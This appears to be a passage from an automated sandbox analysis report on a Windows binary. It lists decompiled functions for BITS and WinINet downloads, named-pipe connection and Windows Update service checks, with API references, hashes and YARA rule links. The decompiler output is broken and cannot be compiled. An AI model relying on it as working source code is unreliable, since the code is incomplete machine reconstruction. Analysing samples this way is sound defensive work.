                                                                                                                                                                  • Failed to set callback interface for BITS job., xrefs: 0042655B
                                                                                                                                                                  • Failed to copy download URL., xrefs: 0042646A
                                                                                                                                                                  • Failed to add file to BITS job., xrefs: 004264F0
                                                                                                                                                                  • Failed to set credentials for BITS job., xrefs: 004264D1
                                                                                                                                                                  • Failed to complete BITS job., xrefs: 004265CC
                                                                                                                                                                  • Failed to create BITS job callback., xrefs: 00426536
                                                                                                                                                                  • Invalid BITS engine URL: %ls, xrefs: 00426445
                                                                                                                                                                  • Failed to create BITS job., xrefs: 004264B2
                                                                                                                                                                  • Failed to initialize BITS job callback., xrefs: 00426544
                                                                                                                                                                  • Failed while waiting for BITS download., xrefs: 004265D3
                                                                                                                                                                  • Falied to start BITS job., xrefs: 004265DA
                                                                                                                                                                  • bitsengine.cpp, xrefs: 00426439, 0042652C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                                  • API String ID: 1659193697-2382896028
                                                                                                                                                                  • Opcode ID: 16016408a7cb9dbdef7d256708e006ae799649f740fb7990378b6ec7117ee2b5
                                                                                                                                                                  • Instruction ID: 515a0813f1598d88cce38c9a1c1ae97e94f9427ae093fa8052ebe463c40f0143
                                                                                                                                                                  • Opcode Fuzzy Hash: 16016408a7cb9dbdef7d256708e006ae799649f740fb7990378b6ec7117ee2b5
                                                                                                                                                                  • Instruction Fuzzy Hash: 7551A331B00235FBCB11AF55E885E5E7BA4AF08720F62415BFC04AB291DB7CDD419B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004255EF, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 184networkstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E004255EF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, WCHAR* _a32, WCHAR* _a36, void** _a40, void** _a44, intOrPtr _a48) {
				int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				short _v32;
				WCHAR* _v36;
				void _v40;
				void* _t39;
				WCHAR* _t49;
				void* _t50;
				signed short _t53;
				void* _t74;
				WCHAR* _t75;
				signed int _t77;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t85;
				void* _t89;
				void* _t90;
				WCHAR* _t91;

				_t89 = 0;
				_t77 = 7;
				_t74 = 0;
				_t39 = memset( &_v40, 0, _t77 << 2);
				_v8 = 0;
				_t85 = _t39;
				while(1) {
					_v12 = _t89;
					if(_t74 != 0) {
						InternetCloseHandle(_t74);
						_t74 = _t89;
						_v8 = _t74;
					}
					if(_t85 != 0) {
						InternetCloseHandle(_t85);
						_t85 = _t89;
					}
					_t90 = E00438A49( *_a20,  &_v40);
					if(_t90 < 0) {
						break;
					}
					_t91 = _a36;
					if(_t91 == 0) {
						L9:
						_t82 = _v24;
					} else {
						_t82 = _t91;
						if( *_t91 == 0) {
							goto L9;
						}
					}
					_t49 = _a32;
					if(_t49 == 0) {
						L12:
						_t81 = _v28;
					} else {
						_t81 = _t49;
						if( *_t49 == 0) {
							goto L12;
						}
					}
					_push(0);
					_push(0);
					_t50 = 3;
					_t51 =  ==  ? 1 : _t50;
					_t85 = InternetConnectW(_a16, _v36, _v32, _t81, _t82,  ==  ? 1 : _t50, ??, ??);
					if(_t85 == 0) {
						_t53 = GetLastError();
						_t94 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						_t90 =  >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "downloadengine.cpp", 0x216, _t90);
						_push( *_a20);
						_push("Failed to connect to URL: %ls");
						goto L25;
					} else {
						_t75 = _a32;
						if(_t75 != 0 &&  *_t75 != 0 && _t91 != 0 &&  *_t91 != 0 && InternetSetOptionW(_t85, 0x2b, _t75, lstrlenW(_t75)) != 0) {
							InternetSetOptionW(_t85, 0x2c, _t91, lstrlenW(_t91));
						}
						_t90 = E004257C9(_t81, _t85, _a24, _v40, _v20, _v16, _a28,  &_v8);
						if(_t90 < 0) {
							E00430A57(_t90, "Failed to open internet URL: %ls",  *_a20);
							_t74 = _v8;
						} else {
							_t74 = _v8;
							_t90 = E00425909(_t81, _a4, _a8, _a12, _t74, _a20,  &_v12, _a48);
							if(_t90 < 0) {
								_push( *_a20);
								_push("Failed to send request to URL: %ls");
								L25:
								_push(_t90);
								E00430A57();
							} else {
								if(_v12 != 0) {
									_t89 = 0;
									continue;
								} else {
									 *_a40 = _t85;
									_t85 = 0;
									 *_a44 = _t74;
									_t74 = 0;
								}
							}
						}
					}
					L29:
					E00438A74( &_v40);
					if(_t74 != 0) {
						InternetCloseHandle(_t74);
					}
					if(_t85 != 0) {
						InternetCloseHandle(_t85);
					}
					return _t90;
				}
				_push("Failed to break URL into server and resource parts.");
				_push(_t90);
				E00430A57();
				goto L29;
			}

























                                                                                                                                                                  0x004255f8
                                                                                                                                                                  0x004255fe
                                                                                                                                                                  0x00425602
                                                                                                                                                                  0x00425604
                                                                                                                                                                  0x00425606
                                                                                                                                                                  0x00425609
                                                                                                                                                                  0x0042560f
                                                                                                                                                                  0x0042560f
                                                                                                                                                                  0x00425614
                                                                                                                                                                  0x00425617
                                                                                                                                                                  0x0042561d
                                                                                                                                                                  0x0042561f
                                                                                                                                                                  0x0042561f
                                                                                                                                                                  0x00425624
                                                                                                                                                                  0x00425627
                                                                                                                                                                  0x0042562d
                                                                                                                                                                  0x0042562d
                                                                                                                                                                  0x0042563d
                                                                                                                                                                  0x00425641
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425647
                                                                                                                                                                  0x0042564e
                                                                                                                                                                  0x00425657
                                                                                                                                                                  0x00425657
                                                                                                                                                                  0x00425650
                                                                                                                                                                  0x00425650
                                                                                                                                                                  0x00425655
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425655
                                                                                                                                                                  0x0042565a
                                                                                                                                                                  0x0042565f
                                                                                                                                                                  0x00425668
                                                                                                                                                                  0x00425668
                                                                                                                                                                  0x00425661
                                                                                                                                                                  0x00425661
                                                                                                                                                                  0x00425666
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425666
                                                                                                                                                                  0x0042566b
                                                                                                                                                                  0x0042566c
                                                                                                                                                                  0x0042566f
                                                                                                                                                                  0x00425676
                                                                                                                                                                  0x0042568b
                                                                                                                                                                  0x0042568f
                                                                                                                                                                  0x0042575a
                                                                                                                                                                  0x0042576b
                                                                                                                                                                  0x00425775
                                                                                                                                                                  0x00425783
                                                                                                                                                                  0x0042578b
                                                                                                                                                                  0x0042578d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425695
                                                                                                                                                                  0x00425695
                                                                                                                                                                  0x0042569a
                                                                                                                                                                  0x004256d0
                                                                                                                                                                  0x004256d0
                                                                                                                                                                  0x004256eb
                                                                                                                                                                  0x004256ef
                                                                                                                                                                  0x0042574d
                                                                                                                                                                  0x00425752
                                                                                                                                                                  0x004256f1
                                                                                                                                                                  0x004256f4
                                                                                                                                                                  0x0042570d
                                                                                                                                                                  0x00425711
                                                                                                                                                                  0x00425730
                                                                                                                                                                  0x00425732
                                                                                                                                                                  0x00425737
                                                                                                                                                                  0x00425737
                                                                                                                                                                  0x00425738
                                                                                                                                                                  0x00425713
                                                                                                                                                                  0x00425717
                                                                                                                                                                  0x0042560d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042571d
                                                                                                                                                                  0x00425720
                                                                                                                                                                  0x00425725
                                                                                                                                                                  0x00425727
                                                                                                                                                                  0x00425729
                                                                                                                                                                  0x00425729
                                                                                                                                                                  0x00425717
                                                                                                                                                                  0x00425711
                                                                                                                                                                  0x004256ef
                                                                                                                                                                  0x004257a1
                                                                                                                                                                  0x004257a5
                                                                                                                                                                  0x004257ac
                                                                                                                                                                  0x004257af
                                                                                                                                                                  0x004257af
                                                                                                                                                                  0x004257b7
                                                                                                                                                                  0x004257ba
                                                                                                                                                                  0x004257ba
                                                                                                                                                                  0x004257c6
                                                                                                                                                                  0x004257c6
                                                                                                                                                                  0x00425794
                                                                                                                                                                  0x00425799
                                                                                                                                                                  0x0042579a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00425617
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00425627
                                                                                                                                                                  • InternetConnectW.WININET(00000000,00000000,00000000,?,00000000,00000003,00000000,00000000), ref: 00425685
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004256AD
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000002B,?,00000000), ref: 004256BE
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004256C5
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000002C,?,00000000), ref: 004256D0
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004257AF
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004257BA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to connect to URL: %ls, xrefs: 0042578D
                                                                                                                                                                  • Failed to open internet URL: %ls, xrefs: 00425747
                                                                                                                                                                  • Failed to send request to URL: %ls, xrefs: 00425732
                                                                                                                                                                  • downloadengine.cpp, xrefs: 0042577E
                                                                                                                                                                  • Failed to break URL into server and resource parts., xrefs: 00425794
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$Optionlstrlen$Connect
                                                                                                                                                                  • String ID: Failed to break URL into server and resource parts.$Failed to connect to URL: %ls$Failed to open internet URL: %ls$Failed to send request to URL: %ls$downloadengine.cpp
                                                                                                                                                                  • API String ID: 1145286777-2897276973
                                                                                                                                                                  • Opcode ID: 7646d53f9c6ffde3578474e344e6995eb564c30b84d47ac4c83e93a3dd0f81ca
                                                                                                                                                                  • Instruction ID: 454cca8ee1e62b51d527cee8f9c9373d960df165fe15c76356523d58fe9d2068
                                                                                                                                                                  • Opcode Fuzzy Hash: 7646d53f9c6ffde3578474e344e6995eb564c30b84d47ac4c83e93a3dd0f81ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 3051C532A00625EBDB129FD5AC84EAF77B9EF88740F51002AFD05A7250D739CD119BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EF74, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 154sleepfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                  			E0040EF74(void* __ebx, void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t23;
				void* _t33;
				long _t41;
				long* _t42;
				intOrPtr* _t50;
				void* _t53;
				void* _t54;
				void* _t65;
				void* _t66;

				_v8 = _v8 & 0x00000000;
				_t50 = _a4;
				_t53 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls",  *_t50);
				_t66 = _t65 + 0xc;
				if(_t53 >= 0) {
					_t54 = 0x8000ffff;
					_t41 = 0;
					while(_t41 < 0x708) {
						_t21 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
						 *(_t50 + 0x10) = _t21;
						if(_t21 != 0xffffffff) {
							_t54 = 0;
						} else {
							_t64 =  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
							_t21 = 0x800705b4;
							_t54 =  ==  ? 0x800705b4 :  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
							Sleep(0x64);
						}
						_t41 = _t41 + 1;
						if(_t54 < 0) {
							continue;
						}
						break;
					}
					if(_t54 >= 0) {
						_t8 = _t50 + 8; // 0x8
						_t42 = _t8;
						_t53 = E0040EB2E( *(_t50 + 0x10),  *((intOrPtr*)(_t50 + 4)), _t42);
						if(_t53 >= 0) {
							if(_a8 == 0) {
								L19:
								_t23 = OpenProcess(0x100000, 0,  *_t42);
								 *(_t50 + 0xc) = _t23;
								if(_t23 == 0) {
									_t58 =  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
									_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
									E004300D9(0x80004005, "pipe.cpp", 0x2a8, _t53);
									_push( *_t42);
									_push("Failed to open companion process with PID: %u");
									goto L21;
								}
							} else {
								_t53 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t50);
								_t66 = _t66 + 0xc;
								if(_t53 >= 0) {
									_t33 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
									 *(_t50 + 0x14) = _t33;
									if(_t33 != 0xffffffff) {
										_t53 = E0040EB2E(_t33,  *((intOrPtr*)(_t50 + 4)), _t42);
										if(_t53 < 0) {
											goto L12;
										} else {
											goto L19;
										}
									} else {
										_t61 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
										_t21 = 0x80004005;
										_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
										_push(_t53);
										_push(0x29f);
										goto L10;
									}
								} else {
									_push("Failed to allocate name of parent cache pipe.");
									_push(_t53);
									E00430A57();
								}
							}
						} else {
							L12:
							_push(_v8);
							_push("Failed to verify parent pipe: %ls");
							goto L21;
						}
					} else {
						_push(_t54);
						_push(0x290);
						L10:
						_push("pipe.cpp");
						E004300D9(_t21);
						_push(_v8);
						_push("Failed to open parent pipe: %ls");
						L21:
						_push(_t53);
						E00430A57();
					}
				} else {
					_push("Failed to allocate name of parent pipe.");
					_push(_t53);
					E00430A57();
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t53;
			}













                                                                                                                                                                  0x0040ef78
                                                                                                                                                                  0x0040ef7e
                                                                                                                                                                  0x0040ef91
                                                                                                                                                                  0x0040ef93
                                                                                                                                                                  0x0040ef98
                                                                                                                                                                  0x0040efad
                                                                                                                                                                  0x0040efb2
                                                                                                                                                                  0x0040efb4
                                                                                                                                                                  0x0040efce
                                                                                                                                                                  0x0040efd4
                                                                                                                                                                  0x0040efda
                                                                                                                                                                  0x0040f008
                                                                                                                                                                  0x0040efdc
                                                                                                                                                                  0x0040efed
                                                                                                                                                                  0x0040eff0
                                                                                                                                                                  0x0040effd
                                                                                                                                                                  0x0040f000
                                                                                                                                                                  0x0040f000
                                                                                                                                                                  0x0040f00a
                                                                                                                                                                  0x0040f00d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f00d
                                                                                                                                                                  0x0040f011
                                                                                                                                                                  0x0040f030
                                                                                                                                                                  0x0040f030
                                                                                                                                                                  0x0040f03f
                                                                                                                                                                  0x0040f043
                                                                                                                                                                  0x0040f056
                                                                                                                                                                  0x0040f0e2
                                                                                                                                                                  0x0040f0eb
                                                                                                                                                                  0x0040f0f1
                                                                                                                                                                  0x0040f0f6
                                                                                                                                                                  0x0040f109
                                                                                                                                                                  0x0040f113
                                                                                                                                                                  0x0040f121
                                                                                                                                                                  0x0040f126
                                                                                                                                                                  0x0040f128
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f128
                                                                                                                                                                  0x0040f05c
                                                                                                                                                                  0x0040f06c
                                                                                                                                                                  0x0040f06e
                                                                                                                                                                  0x0040f073
                                                                                                                                                                  0x0040f097
                                                                                                                                                                  0x0040f09d
                                                                                                                                                                  0x0040f0a3
                                                                                                                                                                  0x0040f0d8
                                                                                                                                                                  0x0040f0dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f0a5
                                                                                                                                                                  0x0040f0b6
                                                                                                                                                                  0x0040f0b9
                                                                                                                                                                  0x0040f0c0
                                                                                                                                                                  0x0040f0c3
                                                                                                                                                                  0x0040f0c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f0c4
                                                                                                                                                                  0x0040f075
                                                                                                                                                                  0x0040f075
                                                                                                                                                                  0x0040f07a
                                                                                                                                                                  0x0040f07b
                                                                                                                                                                  0x0040f081
                                                                                                                                                                  0x0040f073
                                                                                                                                                                  0x0040f045
                                                                                                                                                                  0x0040f045
                                                                                                                                                                  0x0040f045
                                                                                                                                                                  0x0040f048
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f048
                                                                                                                                                                  0x0040f013
                                                                                                                                                                  0x0040f013
                                                                                                                                                                  0x0040f014
                                                                                                                                                                  0x0040f019
                                                                                                                                                                  0x0040f019
                                                                                                                                                                  0x0040f01e
                                                                                                                                                                  0x0040f023
                                                                                                                                                                  0x0040f026
                                                                                                                                                                  0x0040f12d
                                                                                                                                                                  0x0040f12d
                                                                                                                                                                  0x0040f12e
                                                                                                                                                                  0x0040f133
                                                                                                                                                                  0x0040ef9a
                                                                                                                                                                  0x0040ef9a
                                                                                                                                                                  0x0040ef9f
                                                                                                                                                                  0x0040efa0
                                                                                                                                                                  0x0040efa6
                                                                                                                                                                  0x0040f13b
                                                                                                                                                                  0x0040f140
                                                                                                                                                                  0x0040f140
                                                                                                                                                                  0x0040f14a

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 0040EFCE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040EFDC
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0040F000
                                                                                                                                                                  Strings
                                                                                                                                                                  • \\.\pipe\%ls, xrefs: 0040EF86
                                                                                                                                                                  • Failed to verify parent pipe: %ls, xrefs: 0040F048
                                                                                                                                                                  • Failed to open parent pipe: %ls, xrefs: 0040F026
                                                                                                                                                                  • Failed to allocate name of parent pipe., xrefs: 0040EF9A
                                                                                                                                                                  • \\.\pipe\%ls.Cache, xrefs: 0040F061
                                                                                                                                                                  • Failed to open companion process with PID: %u, xrefs: 0040F128
                                                                                                                                                                  • Failed to allocate name of parent cache pipe., xrefs: 0040F075
                                                                                                                                                                  • pipe.cpp, xrefs: 0040F019, 0040F11C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                                                  • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                  • API String ID: 408151869-645222887
                                                                                                                                                                  • Opcode ID: d775928b9ab7820fb30aafb4168cde3eaf908023b3eebb30eb3a1ae8688aa586
                                                                                                                                                                  • Instruction ID: 91c5317463a7b4fc172767754755c73bf098209d5483b4a4032623304f3b3292
                                                                                                                                                                  • Opcode Fuzzy Hash: d775928b9ab7820fb30aafb4168cde3eaf908023b3eebb30eb3a1ae8688aa586
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C412632940321BBEB316AB19D06B6AB6A4EF04721F210237FD00FA1D1D77D9D109ADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041D8E0, Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 138serviceCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E0041D8E0(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v32;
				struct _SERVICE_STATUS _v36;
				char _v40;
				void** _v44;
				void* _v48;
				intOrPtr* _v52;
				void* __edi;
				void* __esi;
				signed int _t21;
				void* _t27;
				void* _t32;
				signed short _t44;
				signed short _t47;
				signed short _t50;
				void* _t54;
				signed int _t55;
				void* _t64;
				short* _t65;
				signed int _t75;

				_t21 =  *0x4560d0; // 0xae480e18
				_v8 = _t21 ^ _t75;
				_t55 = 7;
				_v44 = _a4;
				_v52 = _a8;
				_t65 = 0;
				memset( &_v36, 0, _t55 << 2);
				_v40 = 0;
				_t27 = OpenSCManagerW(0, 0, 0xf003f);
				_v48 = _t27;
				if(_t27 != 0) {
					_t54 = OpenServiceW(_t27, L"wuauserv", 7);
					if(_t54 != 0) {
						if(QueryServiceStatus(_t54,  &_v36) != 0) {
							if(_v32 == 4) {
								L14:
								 *_v44 = _t54;
								_t54 = 0;
							} else {
								_t65 = E00438466(0, _t54,  &_v40);
								if(_t65 >= 0) {
									if( *((intOrPtr*)(_v40 + 4)) != 4) {
										goto L14;
									} else {
										_t65 = E0041DA76(_t54, 3);
										if(_t65 >= 0) {
											 *_v52 = 1;
											goto L14;
										} else {
											_push("Failed to mark WU service to start on demand.");
											goto L12;
										}
									}
								} else {
									_push("Failed to read configuration for WU service.");
									goto L12;
								}
							}
						} else {
							_t44 = GetLastError();
							_t68 =  <=  ? _t44 : _t44 & 0x0000ffff | 0x80070000;
							_t65 =  >=  ? 0x80004005 :  <=  ? _t44 : _t44 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "msuengine.cpp", 0x19e, _t65);
							_push("Failed to query status of WU service.");
							goto L12;
						}
					} else {
						_t47 = GetLastError();
						_t71 =  <=  ? _t47 : _t47 & 0x0000ffff | 0x80070000;
						_t65 =  >=  ? 0x80004005 :  <=  ? _t47 : _t47 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "msuengine.cpp", 0x19a, _t65);
						_push("Failed to open WU service.");
						goto L12;
					}
				} else {
					_t50 = GetLastError();
					_t74 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
					_t65 =  >=  ? 0x80004005 :  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "msuengine.cpp", 0x197, _t65);
					_push("Failed to open service control manager.");
					L12:
					_push(_t65);
					E00430A57();
				}
				if(_v40 != 0) {
					E00431137(_v40);
				}
				_t64 = CloseServiceHandle;
				if(_t54 != 0) {
					CloseServiceHandle(_t54);
				}
				_t32 = _v48;
				if(_t32 != 0) {
					CloseServiceHandle(_t32);
				}
				return L004267AF(_t65, _v8 ^ _t75, _t64, _t65);
			}























                                                                                                                                                                  0x0041d8e6
                                                                                                                                                                  0x0041d8ed
                                                                                                                                                                  0x0041d8f8
                                                                                                                                                                  0x0041d8fb
                                                                                                                                                                  0x0041d906
                                                                                                                                                                  0x0041d910
                                                                                                                                                                  0x0041d914
                                                                                                                                                                  0x0041d916
                                                                                                                                                                  0x0041d919
                                                                                                                                                                  0x0041d91f
                                                                                                                                                                  0x0041d924
                                                                                                                                                                  0x0041d96c
                                                                                                                                                                  0x0041d970
                                                                                                                                                                  0x0041d9b4
                                                                                                                                                                  0x0041d9ef
                                                                                                                                                                  0x0041da37
                                                                                                                                                                  0x0041da3a
                                                                                                                                                                  0x0041da3c
                                                                                                                                                                  0x0041d9f1
                                                                                                                                                                  0x0041d9fb
                                                                                                                                                                  0x0041d9ff
                                                                                                                                                                  0x0041da0f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041da11
                                                                                                                                                                  0x0041da19
                                                                                                                                                                  0x0041da1d
                                                                                                                                                                  0x0041da31
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041da1f
                                                                                                                                                                  0x0041da1f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041da1f
                                                                                                                                                                  0x0041da1d
                                                                                                                                                                  0x0041da01
                                                                                                                                                                  0x0041da01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041da01
                                                                                                                                                                  0x0041d9ff
                                                                                                                                                                  0x0041d9b6
                                                                                                                                                                  0x0041d9b6
                                                                                                                                                                  0x0041d9c7
                                                                                                                                                                  0x0041d9d1
                                                                                                                                                                  0x0041d9df
                                                                                                                                                                  0x0041d9e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d9e4
                                                                                                                                                                  0x0041d972
                                                                                                                                                                  0x0041d972
                                                                                                                                                                  0x0041d983
                                                                                                                                                                  0x0041d98d
                                                                                                                                                                  0x0041d99b
                                                                                                                                                                  0x0041d9a0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d9a0
                                                                                                                                                                  0x0041d926
                                                                                                                                                                  0x0041d926
                                                                                                                                                                  0x0041d937
                                                                                                                                                                  0x0041d941
                                                                                                                                                                  0x0041d94f
                                                                                                                                                                  0x0041d954
                                                                                                                                                                  0x0041da24
                                                                                                                                                                  0x0041da24
                                                                                                                                                                  0x0041da25
                                                                                                                                                                  0x0041da2b
                                                                                                                                                                  0x0041da42
                                                                                                                                                                  0x0041da47
                                                                                                                                                                  0x0041da47
                                                                                                                                                                  0x0041da4c
                                                                                                                                                                  0x0041da54
                                                                                                                                                                  0x0041da57
                                                                                                                                                                  0x0041da57
                                                                                                                                                                  0x0041da59
                                                                                                                                                                  0x0041da5e
                                                                                                                                                                  0x0041da61
                                                                                                                                                                  0x0041da61
                                                                                                                                                                  0x0041da73

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,?,0041DD10), ref: 0041D919
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0041DD10,?,?), ref: 0041D926
                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000007,?,?,?,?,?,?,?,?,?,0041DD10,?,?), ref: 0041D966
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0041DD10,?,?), ref: 0041D972
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0041DA57
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 0041DA61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Service$CloseErrorHandleLastOpen$Manager
